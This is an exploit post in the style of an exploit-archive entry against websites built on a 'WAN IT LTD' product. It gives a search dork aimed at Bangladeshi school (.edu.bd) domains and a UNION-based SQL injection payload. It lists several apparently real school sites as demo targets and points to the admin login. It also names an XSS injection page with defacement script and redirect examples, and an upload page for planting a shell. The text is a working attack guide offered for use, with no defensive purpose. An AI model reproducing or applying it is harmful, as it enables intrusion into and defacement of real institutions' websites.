#Title: WAN IT LTD SQl/XSS Deface #Dork: intext:"WAN IT LTD" inurl:"id=" +"site:edu.bd" #Date: 26.10.2017 #Test: W10 #CWEs: CWE-89 #Exploit Discovered By: Informacion - Anonymous #Author: mr.Gh0st N@0b #======================# #P00f: #http://site.com/about_us.php?menu=aboutus&id=-about-0000001 {Inject} |--- Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: menu=aboutus&id=-8681' UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x67 495a756b546c697068424a6759715a545a4a4255787748667350656953787a65746450734b4e6f,0x7 16a7a7171)-- Satn Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT] ---| #Admin Panel #http://site.com/admin/ {login Here} #Dem0s: #http://sonarhatsnc.edu.bd/about_us.php… #http://rwahs.edu.bd/about_us.php… #http://rwahs.edu.bd/about_us.php… #http://www.gozkhalimlths.edu.bd/about_us.php… #http://coghighschool.edu.bd/about_us.php… #XSS Alert #/admin/add_news.php?menu=news {Exploit XSS Script} #Example #<script src="http://yourdeface.js"></script> #<META http-equiv="refresh" content="1;URL=yourdefacepage"> #Upload Shell #/admin/add_gallery.php?menu=gallery {Upload Here} #===========================================#